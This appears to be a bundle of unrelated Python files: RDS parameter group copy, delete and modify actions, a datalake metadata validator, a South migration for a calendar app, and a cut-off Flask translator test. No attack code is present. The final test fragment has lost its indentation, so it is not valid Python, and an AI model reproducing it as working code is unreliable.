            'required': ['name'],
            'name': {'type': 'string'},
            'description': {'type': 'string'},
        }
    )

    def process(self, param_groups):
        client = local_session(self.manager.session_factory).client('rds')
        for group in param_groups:
            source_name = self.get_pg_name(group)
            target_name = self.data.get('name')
            target_desc = self.data.get('description',
                                        'Copy of {}'.format(source_name))
            self.do_copy(client, source_name, target_name, target_desc)
            self.log.info('Copied RDS parameter group %s to %s',
                          source_name, target_name)
@pg_actions.register('copy')
class PGCopy(PGMixin, Copy):
    """Copy an RDS parameter group.

    :example:

    .. code-block:: yaml

        policies:
          - name: rds-param-group-copy
            resource: rds-param-group
            filters:
              - DBParameterGroupName: original_pg_name
            actions:
              - type: copy
                name: copy_name
    """

    permissions = ('rds:CopyDBParameterGroup',)

    def do_copy(self, client, name, copy_name, desc):
        # Single API call; Copy.process handles iteration and logging.
        client.copy_db_parameter_group(
            SourceDBParameterGroupIdentifier=name,
            TargetDBParameterGroupIdentifier=copy_name,
            TargetDBParameterGroupDescription=desc,
        )
@pg_cluster_actions.register('copy')
class PGClusterCopy(PGClusterMixin, Copy):
    """Copy an RDS cluster parameter group.

    :example:

    .. code-block:: yaml

        policies:
          - name: rds-cluster-param-group-copy
            resource: rds-cluster-param-group
            filters:
              - DBClusterParameterGroupName: original_cluster_pg_name
            actions:
              - type: copy
                name: copy_name
    """

    permissions = ('rds:CopyDBClusterParameterGroup',)

    def do_copy(self, client, name, copy_name, desc):
        # Single API call; Copy.process handles iteration and logging.
        client.copy_db_cluster_parameter_group(
            SourceDBClusterParameterGroupIdentifier=name,
            TargetDBClusterParameterGroupIdentifier=copy_name,
            TargetDBClusterParameterGroupDescription=desc,
        )
class Delete(BaseAction):
    """Shared implementation for deleting a parameter group.

    Subclasses supply get_pg_name() (via a mixin) and do_delete().
    """

    schema = type_schema('delete')

    def process(self, param_groups):
        client = local_session(self.manager.session_factory).client('rds')
        for group in param_groups:
            name = self.get_pg_name(group)
            try:
                self.do_delete(client, name)
            except ClientError as e:
                # An already-missing group counts as success.
                if e.response['Error']['Code'] == 'DBParameterGroupNotFoundFault':
                    self.log.warning(
                        'RDS parameter group %s already deleted', name)
                    continue
                raise
            self.log.info('Deleted RDS parameter group: %s', name)
@pg_actions.register('delete')
class PGDelete(PGMixin, Delete):
    """Delete an RDS parameter group.

    :example:

    .. code-block:: yaml

        policies:
          - name: rds-param-group-delete
            resource: rds-param-group
            filters:
              - DBParameterGroupName: pg_name
            actions:
              - type: delete
    """

    permissions = ('rds:DeleteDBParameterGroup',)

    def do_delete(self, client, name):
        # Single API call; Delete.process handles not-found and logging.
        client.delete_db_parameter_group(DBParameterGroupName=name)
@pg_cluster_actions.register('delete')
class PGClusterDelete(PGClusterMixin, Delete):
    """Delete an RDS cluster parameter group.

    :example:

    .. code-block:: yaml

        policies:
          - name: rds-cluster-param-group-delete
            resource: rds-cluster-param-group
            filters:
              - DBClusterParameterGroupName: cluster_pg_name
            actions:
              - type: delete
    """

    permissions = ('rds:DeleteDBClusterParameterGroup',)

    def do_delete(self, client, name):
        # Single API call; Delete.process handles not-found and logging.
        client.delete_db_cluster_parameter_group(DBClusterParameterGroupName=name)
class Modify(BaseAction):
    """Shared implementation for modifying parameters in a parameter group.

    Subclasses supply get_pg_name(), get_current_params() and do_modify().
    """

    schema = type_schema(
        'modify',
        **{
            'required': ['params'],
            'params': {
                'type': 'array',
                'items': {
                    'type': 'object',
                    'required': ['name', 'value'],
                    # Per-item keys must live under 'properties' to be
                    # enforced by JSON schema validation; previously they
                    # sat at keyword level and were silently ignored.
                    'properties': {
                        'name': {'type': 'string'},
                        'value': {'type': 'string'},
                        'apply-method': {
                            'type': 'string',
                            'enum': ['immediate', 'pending-reboot'],
                        },
                    },
                },
            },
        }
    )

    def process(self, param_groups):
        client = local_session(self.manager.session_factory).client('rds')

        # Translate policy-style params into the API's Parameter dicts.
        params = []
        for param in self.data.get('params', []):
            params.append({
                'ParameterName': param['name'],
                'ParameterValue': param['value'],
                'ApplyMethod': param.get('apply-method', 'immediate'),
            })

        for param_group in param_groups:
            name = self.get_pg_name(param_group)

            # Fetch the existing parameters for this DB, so we only try to
            # change the ones that are different.
            cur_params = self.get_current_params(client, name)
            changed_params = []
            for param in params:
                param_name = param['ParameterName']
                if (param_name not in cur_params or
                        cur_params[param_name]['ParameterValue'] != param['ParameterValue']):
                    changed_params.append(param)

            # Can only do 20 elements at a time per docs, so if we have more
            # than that we will break it into multiple requests (previously
            # this chunked by 5, making 4x the necessary API calls):
            # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/rds.html#RDS.Client.modify_db_parameter_group
            for param_set in chunks(changed_params, 20):
                self.do_modify(client, name, param_set)

            self.log.info(
                'Modified RDS parameter group %s (%i parameters changed, '
                '%i unchanged)',
                name, len(changed_params), len(params) - len(changed_params))
@pg_actions.register('modify')
class PGModify(PGMixin, Modify):
    """Modify an RDS parameter group.

    :example:

    .. code-block:: yaml

        policies:
          - name: rds-param-group-modify
            resource: rds-param-group
            filters:
              - DBParameterGroupName: pg_name
            actions:
              - type: modify
                params:
                  - name: autocommit
                    value: "1"
                  - name: max_connections
                    value: "100"
    """

    permissions = ('rds:DescribeDBParameters', 'rds:ModifyDBParameterGroup')

    def get_current_params(self, client, name):
        """Map parameter name -> current value/apply-method for *name*."""
        resp = client.describe_db_parameters(DBParameterGroupName=name)
        current = {}
        for p in resp.get('Parameters', []):
            current[p['ParameterName']] = {
                'ParameterValue': p.get('ParameterValue'),
                'ApplyMethod': p['ApplyMethod'],
            }
        return current

    def do_modify(self, client, name, params):
        client.modify_db_parameter_group(DBParameterGroupName=name,
                                         Parameters=params)
@pg_cluster_actions.register('modify')
class PGClusterModify(PGClusterMixin, Modify):
    """Modify an RDS cluster parameter group.

    :example:

    .. code-block:: yaml

        policies:
          - name: rds-cluster-param-group-modify
            resource: rds-cluster-param-group
            filters:
              - DBClusterParameterGroupName: cluster_pg_name
            actions:
              - type: modify
                params:
                  - name: lower_case_table_names
                    value: "1"
                  - name: master_verify_checksum
                    value: "1"
    """

    permissions = ('rds:DescribeDBClusterParameters',
                   'rds:ModifyDBClusterParameterGroup')

    def get_current_params(self, client, name):
        """Map parameter name -> current value/apply-method for *name*."""
        resp = client.describe_db_cluster_parameters(
            DBClusterParameterGroupName=name)
        current = {}
        for p in resp.get('Parameters', []):
            current[p['ParameterName']] = {
                'ParameterValue': p.get('ParameterValue'),
                'ApplyMethod': p['ApplyMethod'],
            }
        return current

    def do_modify(self, client, name, params):
        client.modify_db_cluster_parameter_group(
            DBClusterParameterGroupName=name,
            Parameters=params
        )
|
|
# Copyright 2015 Planet Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
from copy import deepcopy
from dateutil.parser import parse as dateparse
from datetime import datetime
from pytz import utc
from uuid import uuid4
import re
import simplejson as json
from simplejson.scanner import JSONDecodeError
import os
import pytz
# Heuristic cutoff for interpreting numeric timestamps: values at or above
# this are treated as milliseconds rather than seconds.
# as seconds: 5138-11-16 09:46:40
# as milliseconds: 1973-03-03 09:46:40
MAX_TS_SECONDS = 100000000000
# Python 2/3 compatibility shim: `long` and `basestring` do not exist on
# Python 3, so alias them to their closest equivalents.
try:
    long = long
except NameError:
    # Python3
    long = int
    basestring = str
class InvalidDatalakeMetadata(Exception):
    """Raised when metadata is malformed or a required field is missing."""
    pass
class UnsupportedDatalakeMetadataVersion(Exception):
    """Raised when metadata declares a version other than the supported one."""
    pass
# Unix epoch as an aware UTC datetime; reference point for normalization.
_EPOCH = datetime.fromtimestamp(0, utc)
# Matches absolute Windows paths such as C:\foo\bar.
_WINDOWS_ABS_PATH = re.compile(r'^[a-zA-Z]:\\.+')
class Metadata(dict):
    """Datalake file metadata: a dict that validates and normalizes itself.

    Construction fills in defaults ('id', 'version', 'end'), validates the
    required fields, and normalizes 'start'/'end' to integer milliseconds
    since the epoch. The operations in __init__ are order-dependent.
    """
    # Schema version produced and accepted by this implementation.
    _VERSION = 0
    def __init__(self, *args, **kwargs):
        '''prepare compliant, normalized metadata from inputs
        Args:
            kwargs: key-value pairs for metadata fields.
        Raises:
            InvalidDatalakeMetadata if required fields are missing and cannot
            be inferred.
        '''
        # we want to own all of our bits so we can normalize them without
        # altering the caller's data unexpectedly. So deepcopy.
        args = deepcopy(args)
        kwargs = deepcopy(kwargs)
        super(Metadata, self).__init__(*args, **kwargs)
        self._ensure_id()
        self._ensure_version()
        self._validate()
        self._normalize_dates()
        self._validate_interval() # must occur after normalizing
    @classmethod
    def from_json(cls, j):
        """Alternate constructor: build a Metadata from a JSON string.

        Raises InvalidDatalakeMetadata for None or unparseable input.
        """
        if j is None:
            raise InvalidDatalakeMetadata('None is not a valid JSON')
        try:
            return cls(json.loads(j))
        except JSONDecodeError:
            msg = '{} is not valid json'.format(repr(j))
            raise InvalidDatalakeMetadata(msg)
    @property
    def json(self):
        """This metadata serialized as a JSON string."""
        return json.dumps(self)
    def _ensure_id(self):
        # Generate a random id when the caller did not supply one.
        if 'id' not in self:
            self['id'] = uuid4().hex
    def _ensure_version(self):
        # Default to the current schema version when none was supplied.
        if 'version' not in self:
            self['version'] = self._VERSION
    def _validate(self):
        # Run all structural validations; each raises on failure.
        self._validate_required_fields()
        self._validate_version()
        self._validate_slug_fields()
        self._validate_work_id()
        self._validate_path()
    # Fields that must be present and non-None ('end' and 'work_id' are
    # handled separately: 'end' may be None, 'work_id' must merely exist).
    _REQUIRED_METADATA_FIELDS = ['version', 'start', 'where', 'what', 'id',
                                 'hash', 'path']
    def _validate_required_fields(self):
        for f in self._REQUIRED_METADATA_FIELDS:
            if self.get(f) is None:
                msg = '"{}" is a required field'.format(f)
                raise InvalidDatalakeMetadata(msg)
    def _validate_version(self):
        # Only the exact supported schema version is accepted.
        v = self['version']
        if v != self._VERSION:
            msg = ('Found version {}. '
                   'Only {} is supported').format(v, self._VERSION)
            raise UnsupportedDatalakeMetadataVersion(msg)
    # Fields restricted to slug characters (lower-case alnum, '_', '-').
    _SLUG_FIELDS = ['where', 'what']
    def _validate_slug_fields(self):
        [self._validate_slug_field(f) for f in self._SLUG_FIELDS]
    def _validate_slug_field(self, f):
        if not re.match(r'^[a-z0-9_-]+$', self[f]):
            msg = ('Invalid value "{}" for "{}". Only lower-case letters, '
                   '_ and - are allowed.').format(self[f], f)
            raise InvalidDatalakeMetadata(msg)
    def _validate_slug_field_with_dots(self, f):
        # Like _validate_slug_field but additionally permits dots.
        if not re.match(r'^[\.a-z0-9_-]+$', self[f]):
            msg = ('Invalid value "{}" for "{}". Only lower-case letters, '
                   'underscores, dashes, and dots '
                   'are allowed.').format(self[f], f)
            raise InvalidDatalakeMetadata(msg)
    def _validate_work_id(self):
        # 'work_id' must be present; None is an accepted value, but the
        # literal string 'null' is rejected to avoid ambiguity with None.
        if 'work_id' not in self:
            msg = '"work_id" is required, but it can be None'
            raise InvalidDatalakeMetadata(msg)
        if self['work_id'] is None:
            return
        self._validate_slug_field('work_id')
        if self['work_id'] == 'null':
            msg = '"work_id" cannot be the string "null"'
            raise InvalidDatalakeMetadata(msg)
    def _validate_path(self):
        # Accept either a POSIX absolute path or a Windows drive path.
        if not os.path.isabs(self['path']) and \
                not self._is_windows_abs(self['path']):
            msg = '{} is not an absolute path.'.format(self['path'])
            raise InvalidDatalakeMetadata(msg)
    def _is_windows_abs(self, path):
        return _WINDOWS_ABS_PATH.match(path) is not None
    def _validate_interval(self):
        # Must run after _normalize_dates so both endpoints are integers.
        # NOTE(review): the check permits end == start although the message
        # says "greater than" -- confirm whether equality is intentional.
        end_val = self['end']
        if end_val is None:
            return
        if end_val < self['start']:
            msg = '"end" must be greater than "start"'
            raise InvalidDatalakeMetadata(msg)
    def _normalize_dates(self):
        self['start'] = self.normalize_date(self['start'])
        self._normalize_end()
    def _normalize_end(self):
        # 'end' is optional; default it to None, normalize when present.
        end_val = self.setdefault('end', None)
        if end_val is not None:
            self['end'] = self.normalize_date(end_val)
    @staticmethod
    def normalize_date(date):
        '''normalize the specified date to milliseconds since the epoch
        If it is a string, it is assumed to be some sort of datetime such as
        "2015-12-27" or "2015-12-27T11:01:20.954". If date is a naive datetime,
        it is assumed to be UTC.
        If numeric arguments are beyond 5138-11-16 (100,000,000,000 seconds
        after epoch), they are interpreted as milliseconds since the epoch.
        '''
        if isinstance(date, datetime):
            pass
        elif date == "now":
            date = datetime.now(pytz.UTC)
        elif isinstance(date, (basestring, int, float, long)):
            try:
                ts = float(date)
                if ts > MAX_TS_SECONDS:
                    # ts was provided in ms
                    ts = ts / 1000.0
                # For unix timestamps on command line
                date = datetime.utcfromtimestamp(float(ts))
            except ValueError:
                # Not numeric; fall back to dateutil's datetime parsing.
                try:
                    date = dateparse(date)
                except ValueError as e:
                    raise InvalidDatalakeMetadata(str(e))
        else:
            msg = 'could not parse a date from {!r}'.format(date)
            raise InvalidDatalakeMetadata(msg)
        return Metadata._from_datetime(date)
    @staticmethod
    def _from_datetime(date):
        # Naive datetimes are assumed to be UTC.
        if not date.tzinfo:
            date = date.replace(tzinfo=utc)
        return Metadata._datetime_to_milliseconds(date)
    @staticmethod
    def _datetime_to_milliseconds(d):
        # Integer milliseconds since the Unix epoch (truncated toward zero).
        delta = d - _EPOCH
        return int(delta.total_seconds()*1000.0)
|
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from jmbo import USE_GIS
class Migration(SchemaMigration):
    """Auto-generated South migration: adds the nullable
    'Event.external_link' CharField to the jmbo_calendar app.

    The ``models`` dict below is frozen ORM state captured by South at
    generation time -- do not hand-edit it.
    """
    def forwards(self, orm):
        # Adding field 'Event.external_link'
        db.add_column('jmbo_calendar_event', 'external_link',
                      self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
                      keep_default=False)
    def backwards(self, orm):
        # Deleting field 'Event.external_link'
        db.delete_column('jmbo_calendar_event', 'external_link')
    # Frozen ORM snapshot (generated by South) of every model this
    # migration may reference.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'category.category': {
            'Meta': {'ordering': "('title',)", 'object_name': 'Category'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'category.tag': {
            'Meta': {'ordering': "('title',)", 'object_name': 'Tag'},
            'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'jmbo.modelbase': {
            'Meta': {'ordering': "('-created',)", 'object_name': 'ModelBase'},
            'anonymous_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'anonymous_likes': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
            'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
            'comments_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'comments_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
            'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
            'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modelbase_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
            'likes_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'likes_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
            'primary_category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'primary_modelbase_set'", 'null': 'True', 'to': "orm['category.Category']"}),
            'publish_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'publishers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['publisher.Publisher']", 'null': 'True', 'blank': 'True'}),
            'retract_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
            'state': ('django.db.models.fields.CharField', [], {'default': "'unpublished'", 'max_length': '32', 'null': 'True', 'blank': 'True'}),
            'subtitle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Tag']", 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
        },
        'jmbo_calendar.calendar': {
            'Meta': {'ordering': "('-created',)", 'object_name': 'Calendar', '_ormbases': ['jmbo.ModelBase']},
            'modelbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['jmbo.ModelBase']", 'unique': 'True', 'primary_key': 'True'})
        },
        'jmbo_calendar.event': {
            'Meta': {'ordering': "('start',)", 'object_name': 'Event', '_ormbases': ['jmbo.ModelBase']},
            'calendars': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'event_calendars'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['jmbo_calendar.Calendar']"}),
            'content': ('ckeditor.fields.RichTextField', [], {}),
            'end': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
            'external_link': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'parent_ptr': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'+'", 'unique': 'True', 'primary_key': 'True', 'to': "orm['jmbo.ModelBase']"}),
            'repeat': ('django.db.models.fields.CharField', [], {'default': "'does_not_repeat'", 'max_length': '64'}),
            'repeat_until': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
            'start': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'})
        },
        'photologue.photo': {
            'Meta': {'ordering': "['-date_added']", 'object_name': 'Photo'},
            'caption': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
            'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'photo_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
            'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'tags': ('photologue.models.TagField', [], {'max_length': '255', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
            'title_slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
            'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
        },
        'photologue.photoeffect': {
            'Meta': {'object_name': 'PhotoEffect'},
            'background_color': ('django.db.models.fields.CharField', [], {'default': "'#FFFFFF'", 'max_length': '7'}),
            'brightness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
            'color': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
            'contrast': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
            'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'filters': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
            'reflection_size': ('django.db.models.fields.FloatField', [], {'default': '0'}),
            'reflection_strength': ('django.db.models.fields.FloatField', [], {'default': '0.59999999999999998'}),
            'sharpness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
            'transpose_method': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'})
        },
        'publisher.publisher': {
            'Meta': {'object_name': 'Publisher'},
            'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
        },
        'secretballot.vote': {
            'Meta': {'unique_together': "(('token', 'content_type', 'object_id'),)", 'object_name': 'Vote'},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'token': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'vote': ('django.db.models.fields.SmallIntegerField', [], {})
        },
        'sites.site': {
            'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
            'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        }
    }
    # When GIS support is enabled, extend the frozen ORM with the atlas
    # models and the ModelBase.location foreign key that depends on them.
    if USE_GIS:
        models.update({
            'atlas.city': {
                'Meta': {'ordering': "('name',)", 'object_name': 'City'},
                'coordinates': ('atlas.fields.CoordinateField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}),
                'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}),
                'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
                'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
                'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Region']", 'null': 'True', 'blank': 'True'})
            },
            'atlas.country': {
                'Meta': {'ordering': "('name',)", 'object_name': 'Country'},
                'border': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}),
                'country_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2', 'db_index': 'True'}),
                'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
                'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
            },
            'atlas.location': {
                'Meta': {'object_name': 'Location'},
                'address': ('django.db.models.fields.TextField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
                'city': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.City']"}),
                'coordinates': ('atlas.fields.CoordinateField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}),
                'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}),
                'description': ('django.db.models.fields.TextField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
                'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
                'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
                'photo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['photologue.Photo']", 'null': 'True', 'blank': 'True'})
            },
            'atlas.region': {
                'Meta': {'ordering': "('name',)", 'unique_together': "(('country', 'code'),)", 'object_name': 'Region'},
                'border': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}),
                'code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}),
                'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}),
                'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
                'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
            }
        })
        models['jmbo.modelbase']['location'] = ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Location']", 'null': 'True', 'blank': 'True'})
    complete_apps = ['jmbo_calendar']
|
|
import json
from flask import request
from mock import patch
import appcomposer.translator.translation_listing as trlisting
from appcomposer import redis_store
from appcomposer.login import graasp_oauth_login_redirect
from appcomposer.tests.translator.fake_requests import create_requests_mock
from appcomposer.tests.utils import ComposerTest
from appcomposer.translator.tasks import synchronize_apps_no_cache_wrapper, task_synchronize_single_app, task_sync_repo_apps_all, task_download_repository_apps
from appcomposer.translator.mongodb_pusher import sync_mongodb_all, sync_mongodb_last_hour
from appcomposer.views.api import api_translate, bundle_update
from appcomposer.translator.mongodb_pusher import mongo_translation_urls, mongo_bundles, sync
class TranslatorTest(ComposerTest):
def setUp(self):
trlisting.DEBUG_VERBOSE = False
super(TranslatorTest, self).setUp()
mongo_translation_urls.remove()
mongo_bundles.remove()
redis_store.flushall()
def assertAppMongoDB(self, language, url, messages, messages_prefix = ''):
resultUrl = mongo_translation_urls.find_one({'_id':'{0}_ALL_ALL::http://{1}/languages/{2}en_ALL.xml'.format(language, url, messages_prefix)})
resultApp = mongo_bundles.find_one({'_id':'{0}_ALL_ALL::http://{1}/{2}gadget.xml'.format(language, url, messages_prefix)})
self.assertIsNotNone(resultUrl)
self.assertIsNotNone(resultApp)
self.assertEquals(resultUrl['data'], resultApp['data'])
data = json.loads(resultUrl['data'])
self.assertEqual(json.dumps(data), json.dumps(messages))
# self.assertDictEqual(data, messages)
def build_dict(self, identifier, number_of_messages, prefix, last = None, exceptions = None):
d = {}
for x in range(number_of_messages):
d['message{0}_{1}'.format(x + 1, identifier)] = "{0}{1}_{2}".format(prefix, x + 1, identifier)
